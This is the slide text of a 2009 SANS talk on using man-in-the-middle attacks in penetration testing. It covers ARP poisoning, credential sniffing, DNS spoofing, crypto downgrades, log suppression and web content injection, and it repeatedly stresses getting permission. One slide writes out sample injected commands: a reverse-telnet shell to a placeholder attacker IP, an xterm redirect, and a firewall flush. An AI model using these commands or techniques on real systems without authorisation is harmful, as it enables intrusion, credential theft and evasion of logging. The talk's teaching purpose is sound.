All your layer are belong to us


Published on

This presentation discusses various uses of man-in-the-middle attacks for penetration testers.

Published in: Technology
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

All your layer are belong to us

  1. 1. SANS Institute“Incorporating Advanced MitM Attacks in Your Penetration Testing Regimen" Layered Security Bryce Galbraith, Owner CISSP, GCIH, GSEC, CEH, CHFI, Security+, CCNA ©2009 SANS & Bryce Galbraith 1
  2. 2. SANS BiographyBryce Galbraith - Lead Consultant, Layered Security Bryce began his IT journey at 10 years of age with a Commodore 64 and a 300 baud modem. As a contributing author of the internationally bestselling book Hacking Exposed: Network Security Secrets & Solutions, Bryce helped bring the secret world of hacking out of the darkness and into the public eye. Bryce has held security positions at global ISPs and Fortune 500 companies as well as being a senior member of Foundstones world-renowned attack and penetration team. Bryce also served as senior instructor and co-author of Foundstones "Ultimate Hacking: Hands-On" series. He has taught the art of ethical hacking and countermeasures to thousands of IT professionals from a whos who of top companies, financial institutions, and government agencies around the globe. Bryce currently teaches Security 504: Hacker Techniques, Exploits and Incident Handling, Security 560: Network Penetration Testing and Ethical Hacking, Security 517: Cutting-Edge Hacking Techniques, Security 550: Advanced Information Recon, Security 401: SANS Security Essentials Bootcamp Style, and Security 561: Network Penetration Testing: Maximizing the Effectiveness of Reports, Exploits, and Command Shells for the SANS Institute. Bryce is an active member of several security-related professional organizations, he speaks at a variety of conferences, and he holds a number of certifications: CISSP, GCIH, GSEC, CEH, CHFI, Security+, and CCNA. Bryce is currently the lead consultant and co-founder of Layered Security. ©2009 SANS & Bryce Galbraith 2
  3. 3. Coming Up!• Overview• Token Warnings• The Toolz• ARP-Poisoning Primer• The Attacks• The Future?• Q&A ©2009 SANS & Bryce Galbraith 3
  4. 4. Overview• What do you do when traditional attack vectors fail? – Remote exploits, password guessing, web app attacks, etc. – Social Engineering? Physical attacks? – They rarely fail but if they do,• What’s left, the report? ©2009 SANS & Bryce Galbraith 4
  5. 5. Overview• There are other options – MitM!• MitM attacks open up systems that might otherwise be impregnable. – No weak passwords, no public exploits, ACLs, strong authentication even – inconceivable, right!? Not exactly…• Besides, MitMs are cooler than guessing passwords or pwning weak systems ;) ©2009 SANS & Bryce Galbraith 5
  6. 6. Overview• We’re going to discuss several strategic uses of MitM…• And the toolz you will need to perform them effectively.• We don’t have time to get into the weeds so I’m going to focus on the scenarios and the toolz… ©2009 SANS & Bryce Galbraith 6
  7. 7. Token Warning• Always, always, always secure written permission prior to performing ANY testing.• Especially the things I’m about to show you.• Client-side attack focus – touchy! ©2009 SANS & Bryce Galbraith 7
  8. 8. Token Warning• Additional considerations• MitM attacks are particularly dangerous on production networks.• They can seriously break things!• The toolz have gotten much better but they are not fool proof.• Always… ©2009 SANS & Bryce Galbraith 8
  9. 9. Token Warning• RTFM – Read the Fine Manual ;) – Because, “There is no patch for stupidity.”• Turn off your personal firewall.• Practice, practice, practice!• Think before you act.• Did I mention permission? ©2009 SANS & Bryce Galbraith 9
  10. 10. Toolz• Ok, so as with most of what we do, we are going to need some toolz.• Practice with these toolz in a lab environment until you are familiar with how they work AND how they fail to work ;) ©2009 SANS & Bryce Galbraith 10
  11. 11. Toolz• dsniff •• An oldie but a goodie• Mostly mentioned here to give credit where credit is do – nice!• Can still be useful… ©2009 SANS & Bryce Galbraith 11
  12. 12. Toolz• dsniff – Passive • dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, webspy – MitM • arpspoof, macof, dnsspoof, sshmitm and webmitm ©2009 SANS & Bryce Galbraith 12
  13. 13. Toolz• ettercap –• Powerful MitM framework• Many, many features.• Extensible with plug-ins and ettercap “filters” – stay tuned!• Current development work?? ©2009 SANS & Bryce Galbraith 13
  14. 14. Toolz• Paros Proxy –• Burp Suite –• Web application proxies with many desirable features for manipulating web traffic – hmm… ©2009 SANS & Bryce Galbraith 14
  15. 15. Toolz• IRS & Sterm –• A powerful duo for exploiting IP- based trust and gaining access to systems with ACLs specifically designed to keep you out! – Can spoof telnet sessions on a switch ©2009 SANS & Bryce Galbraith 15
  16. 16. Toolz• Cain & Abel –• Deceptively easy – oh so powerful!• Too many features to list.• Stay tuned… ©2009 SANS & Bryce Galbraith 16
  17. 17. Toolz• Wireshark –• Good for analysis of traffic and protocols in use on network to find opportunities for exploitation.• A must have general purpose tool. ©2009 SANS & Bryce Galbraith 17
  18. 18. Toolz• Metasploit –• Not a MitM tool per say but very helpful in this whole process.• Some of the latest features in particular.• MitM Framework modules anyone? ©2009 SANS & Bryce Galbraith 18
  19. 19. Toolz• KARMA –• Great for assisting you in attacking wireless clients.• Features are included in Metasploit as of v3.2. ©2009 SANS & Bryce Galbraith 19
  20. 20. Toolz• Rainbow Tables – Google will guide you…• Can be used to crack strong passwords once gathered via MitM. – (e.g. 14 character random password in LanMan form, for example) ©2009 SANS & Bryce Galbraith 20
  21. 21. Toolz• iptables & squid proxy• Your favorite scripting language(s)• Out-the-box thinking – A.K.A a devious mind ;) – “How can I monkey with this traffic to get what I’m after?” ©2009 SANS & Bryce Galbraith 21
  22. 22. Toolz• tcpreplay –• nemesis –• scapy –• sslstrip – ©2009 SANS & Bryce Galbraith 22
  23. 23. Toolz• Hamster & Ferret –• The Middler –• ISR-evilgrade (particularly nasty) –• Browser Exploitation Framework (BeEF) –• Many others… – “Top 100 Network Security Tools” • ©2009 SANS & Bryce Galbraith 23
  24. 24. Toolz• Last but not least,• If you’re going to be doing these attacks over wireless networks• You may need one of these… – They combat mind-control – And protect your brain from RF • ;) ©2009 SANS & Bryce Galbraith 24
  25. 25. Hey man…©2009 SANS & Bryce Galbraith 25
  26. 26. ARP-Poisoning Primer• Before we get rolling I need to make sure everyone has at least a basic understanding of ARP- poisoning and how it can put us in the middle of the action.• An enabler for numerous attacks.• We have limited time so… ©2009 SANS & Bryce Galbraith 26
  27. 27. ARP-Poisoning Primer• On an Ethernet subnet hosts need to know the MAC address(es) of the host(s) they are trying to send Ethernet frames to.• Enter, ARP (Address Resolution Protocol) – ARP resolves IPs to MAC addresses ©2009 SANS & Bryce Galbraith 27
  28. 28. ARP-Poisoning Primer• ARP Requests go out to the broadcast addr FF:FF:FF:FF:FF:FF – Which host has IP w.x.y.z bound to your network adapter?• All hosts receive this broadcast – Even on a switch ©2009 SANS & Bryce Galbraith 28
  29. 29. ARP-Poisoning Primer• Only the host with the requested IP bound to its adapter responds with an ARP Reply – I have w.x.y.z bound and my MAC address is xx:xx:xx:xx:xx:xx• Only the requester sees the reply ©2009 SANS & Bryce Galbraith 29
  30. 30. ARP-Poisoning Primer• Once the MAC is learned a very important thing happens.• It is cached - for a while… – Seconds, minutes, hours - depending• Enter, ARP Cache Poisoning• What if WE can influence this cached ARP entry? ©2009 SANS & Bryce Galbraith 30
  31. 31. ARP-Poisoning Primer• By sending an unrequested ARP Reply (a.k.a Gratuitous ARP Reply), to a host we can poison their ARP Cache with any MAC we choose.• Sweet!• Let’s poison them with our MAC? ©2009 SANS & Bryce Galbraith 31
  32. 32. ARP-Poisoning Primer• If we tell both of them that we’re the other one, turn on a little IP- forwarding and…boom! We’re in the middle!• Now we’re talking…• Not just a local LAN attack either – Poison gateway as well ©2009 SANS & Bryce Galbraith 32
  33. 33. ARP-Poisoning Primer• This attack puts us in a position to potentially influence EVERYthing that happens at Layers 2-7.• If it’s wireless, maybe Layer 1 even• What happens at Layers 2-7?? – What doesn’t happen is a shorter list!• It’s game on! ©2009 SANS & Bryce Galbraith 33
  34. 34. ARP-Poisoning Primer• These attacks can even influence layers 8 and 9, “Politics & Funding" – The most impregnable layers of all!• Demonstrations of these techniques have freed up serious funding and/or caused sweeping policy changes… ©2009 SANS & Bryce Galbraith 34
  35. 35. The Attacks• Now for the fun stuff!• I will lay out several scenarios where using MitM can be of particular use.• Let’s see how to crack the tough nuts!• Not theoretical! These work today… ©2009 SANS & Bryce Galbraith 35
  36. 36. The Attacks• Credential Sniffing – A mainstay of MitM attacks! – I would be remiss if I didn’t mention it - oh so helpful! – MitM makes it possible on switches. – Cain, dnsiff and ettercap excel at this. ©2009 SANS & Bryce Galbraith 36
  37. 37. The Attacks• Credential Sniffing – Web Proxy Logins over HTTP • Using Windows Domain credentials – doh! • I have seen this at numerous clients. – VoIP Sniffing • Nothing quite like it really. – And of course the old favorites… ©2009 SANS & Bryce Galbraith 37
  38. 38. “Can you hear me now?”©2009 SANS & Bryce Galbraith 38
  39. 39. The Attacks• So sniffing is awesome• It can make all the difference in an assessment,• But there are more interesting things that can be done, so let’s move on… ©2009 SANS & Bryce Galbraith 39
  40. 40. The Attacks• Command Injection – Being able to inject arbitrary commands into an existing, authorized connection can be immensely helpful. – Great way to bypass strong authentication systems (e.g. one-time passwords, smart cards, DNA?, etc.) ©2009 SANS & Bryce Galbraith 40
  41. 41. The Attacks• Command Injection – People rely too heavily on authentication and ignore the transport mechanism. • e.g. One-time password system over Telnet/HTTP – Btw, how are tokens synchronized? – Where is this data stored? ©2009 SANS & Bryce Galbraith 41
  42. 42. ©2009 SANS & Bryce Galbraith 42
  43. 43. The Attacks• Command Injection – Sample attacks for *nix targets • xterm –display [hackerIP]:0.0 & • iptables –F • Reverse Telnet – telnet [hackerIP] [port] | /bin/sh | telnet hackerIP [port] • Add an account, disable logging, tftp shadow file, run virtually any command… ©2009 SANS & Bryce Galbraith 43
  44. 44. The Attacks• Command Injection – Sample attacks for Cisco gear • Clear/adjust an ACL • TFTP the router config back to you • Disable/reduce logging • Turn on a service that may help you – SNMP, ip proxy-arp, etc. – You get the idea… ©2009 SANS & Bryce Galbraith 44
  45. 45. The Attacks• Re-Direction – DNS Spoofing • Allows you to direct victims wherever you like • Their URL looks legit (e.g. • Great for: – Delivering client-side attacks to more savvy users – Social Engineering – Advanced phishing attacks » Maybe impersonate the proxy login (if it isn’t already clear-text HTTP ;) ©2009 SANS & Bryce Galbraith 45
  46. 46. The Attacks• Breaking Crypto – Being in the middle affords great opportunities to attack crypto systems as well • SSHv1, RDP, PPTP – RDP MitM yields all keystrokes typed during session • SSL (FTPS, POP3S, IMAPS, LDAPS) • SSL VPNs? Inconceivable! Right? – pwnd! Credentials and all traffic being routed. ©2009 SANS & Bryce Galbraith 46
  47. 47. RDP MitM©2009 SANS & Bryce Galbraith 47
  48. 48. RDP MitM©2009 SANS & Bryce Galbraith 48
  49. 49. RDP MitM©2009 SANS & Bryce Galbraith 49
  50. 50. RDP MitM©2009 SANS & Bryce Galbraith 50
  51. 51. RDP MitM©2009 SANS & Bryce Galbraith 51
  52. 52. RDP MitM©2009 SANS & Bryce Galbraith 52
  53. 53. RDP MitM©2009 SANS & Bryce Galbraith 53
  54. 54. RDP MitM©2009 SANS & Bryce Galbraith 54
  55. 55. RDP MitM©2009 SANS & Bryce Galbraith 55
  56. 56. RDP MitM©2009 SANS & Bryce Galbraith 56
  57. 57. RDP MitM©2009 SANS & Bryce Galbraith 57
  58. 58. RDP MitM No matter what your password is….:[Th3y_w1ll-N3v3r/Gu3$$Th1$0n3]:. ©2009 SANS & Bryce Galbraith 58
  59. 59. The Attacks• Breaking Crypto – Downgrade Attacks • NTLM to LM – Rainbow Tables – done! – Pass-the-Hash Toolkit • PPTP CHAP to PAP • SSHv2 to SSHv1 • And others… ©2009 SANS & Bryce Galbraith 59
  60. 60. The Attacks• Strategic DoS Attacks – What happens if a particular target router using AAA (e.g. RADIUS) can’t reach the server, say three times? • Fails to local login usually • Local password hash is in config – Sniff: TFTP, FTP, Telnet, HTTP, SNMP, etc. – Hi-jack once to get config, then DoS AAA access • Can bypass strong authentication entirely ©2009 SANS & Bryce Galbraith 60
  61. 61. “These are not the logs The Attacks you’re looking for…”• Strategic DoS Attacks – How about syslog? • If we get in the middle of our target and the remote syslog facility… • We can create a warp in the space/time continuum where no log entries are stored! • Just from our target host! All other logging continues unaffected. • Once access is gained, local logs can be removed on the target as well – What hacker? ©2009 SANS & Bryce Galbraith 61
  62. 62. The Attacks• So, I could go on with these types of scenarios but I want to focus on the particularly nasty attacks that MitM enables… ©2009 SANS & Bryce Galbraith 62
  63. 63. The Attacks• Arbitrary Modification/Insertion – It’s all about trusting trust. – We have to trust at some level to get any work done (or “waste” time on non work-related activities ;) – What if the communications to/from the system we “trust” are influenced, real-time, by an attacker? Hmm… ©2009 SANS & Bryce Galbraith 63
  64. 64. The Attacks• Arbitrary Modification/Insertion – The next several scenarios serve as an overview of the numerous opportunities MitM provides with common network traffic. – This actually affects ALL of US when we’re online as well. – “Turnabout is fair play”, as they say... ©2009 SANS & Bryce Galbraith 64
  65. 65. The Attacks• Arbitrary Modification/Insertion – To get the ball rolling, here is a little scenario I cooked up to illustrate what I mean… • DNS spoof to my machine • Proxy the web traffic using Paros Proxy • Use a filter to find/replace html on the return! – The victim(s) see… ©2009 SANS & Bryce Galbraith 65
  66. 66. Virtually any page element or DNS request…©2009 SANS & Bryce Galbraith 66
  67. 67. The Attacks• Arbitrary Modification/Insertion – Being able to modify or insert most anything we want opens up all sorts of opportunities. – Even if the user gets some kind of warning, it’s a “trusted” site right? – Can even bypass tools like the popular NoScript FireFox plug-in! ©2009 SANS & Bryce Galbraith 67
  68. 68. The Attacks• Arbitrary Modification/Insertion – Scenarios • Insert nefarious web content into stream – JavaScript, ActiveX and other active we content… • Major enabler for XSS attacks • Steal auth/session cookies to re-use • IFrame attacks • Substitute any text, links, graphics at will • Replace a download link with your file ;) ©2009 SANS & Bryce Galbraith 68
  69. 69. ©2009 SANS & Bryce Galbraith 69
  70. 70. The Attacks• Arbitrary Modification/Insertion – Scenarios • Substitute imbedded video/audio links • Inject code to post their creds to you first without SSL, then establish SSL and post to the real site. – sslstrip does this • Replace a hyperlink with a UNC connection to cause Windows creds to be sent to you. ©2009 SANS & Bryce Galbraith 70
  71. 71. The Attacks• Arbitrary Modification/Insertion – Scenarios • View contents of the Clipboard of the visiting browser – thank you Internet Explorer! • Pop up windows – “Your Google Toolbar is out-of-date. Click here to…” • ISR-evilgrade – truly nasty • Web-based e-mail – Read/modify messages/contacts, upload/download a different attachment real-time. ©2009 SANS & Bryce Galbraith 71
  72. 72. The Attacks• Arbitrary Modification/Insertion – Scenarios • More realistic and elaborate Phishing and other Social Engineering attacks. – Real site content, slightly modified on the return. • Intranet sites – Phishing? • “Test” web-apps under the context of a legitimate user!? Are they hacking the site?? – By injecting SQL commands for instance ©2009 SANS & Bryce Galbraith 72
  73. 73. The Attacks• Arbitrary Modification/Insertion – Scenarios • VoIP call setup and tear down manipulation – Often clear-text HTTP-like commands • IM traffic – “Check out this file!” • Stock “Pump n’ Dump” transactions • Inject SQL commands between web/app server and the database server – it’s the trusted web/app server, right? ©2009 SANS & Bryce Galbraith 73
  74. 74. The Attacks• Arbitrary Modification/Insertion – Scenarios • Manipulate other protocols, custom protocols… • SCADA – The only limitation here is your imagination really… ©2009 SANS & Bryce Galbraith 74
  75. 75. The Attacks• Arbitrary Modification/Insertion – Getting all of this setup on a local LAN is relatively straight forward. – Wireless is basically the same however it provides for additional opportunities. – Check out this very versatile rig that I use for some wireless attacks… ©2009 SANS & Bryce Galbraith 75
  76. 76. The Attacks• Portable AP w/ Internet So many options… “concourse” Internet - Wireless broadband - Internet Connection Sharing (e.g. EV-DO, EDGE, 3G) D-Link DWL-G730AP - Built-in to many laptops today - Built-in wireless assoc to AP USB Access Point - Running Cain (Windows) - BackTrack in a VM or on a second laptop w/ another wireless card. ©2009 SANS & Bryce Galbraith 76
  77. 77. The Attacks• Uh hmm… – Did I mention permission??• So what about the future? ©2009 SANS & Bryce Galbraith 77
  78. 78. The Future?• We will likely see… – Additional side-jacking tools • Myspace, Facebook, Linkedin, web mail, etc. – RDP playback with full graphical display. Cain gets all the data… – Injection - SSL, RDP, SSHv1, SSHv2? – Additional downgrade attacks – Better VoIP Replay/modification toolz ©2009 SANS & Bryce Galbraith 78
  79. 79. The Future?• How about… – A fully extensible and modular MitM framework built into Metasploit • Metasploit-in-the-Middle anyone?? • Metasploit 3.2 is a start… – RFID attacks? • “Elvis Comes Back from the Dead to Prove RFID ePassports Lack Security” ©2009 SANS & Bryce Galbraith 79
  80. 80. The Future?©2009 SANS & Bryce Galbraith 80
  81. 81. The Future?©2009 SANS & Bryce Galbraith 81
  82. 82. I told you, man…©2009 SANS & Bryce Galbraith 82
  83. 83. End-user awareness?Used in a test. Users couldn’t click it fast enough… ©2009 SANS & Bryce Galbraith 83
  84. 84. Discretion?©2009 SANS & Bryce Galbraith 84
  85. 85. The future?©2009 SANS & Bryce Galbraith 85
  86. 86. SANS Institute“Incorporating Advanced MitM Attacks in Your Penetration Testing Regimen" Layered Security Bryce Galbraith, Lead Consultant & Co-Founder CISSP, GCIH, GSEC, CEH, CHFI, Security+, CCNA ©2009 SANS & Bryce Galbraith 86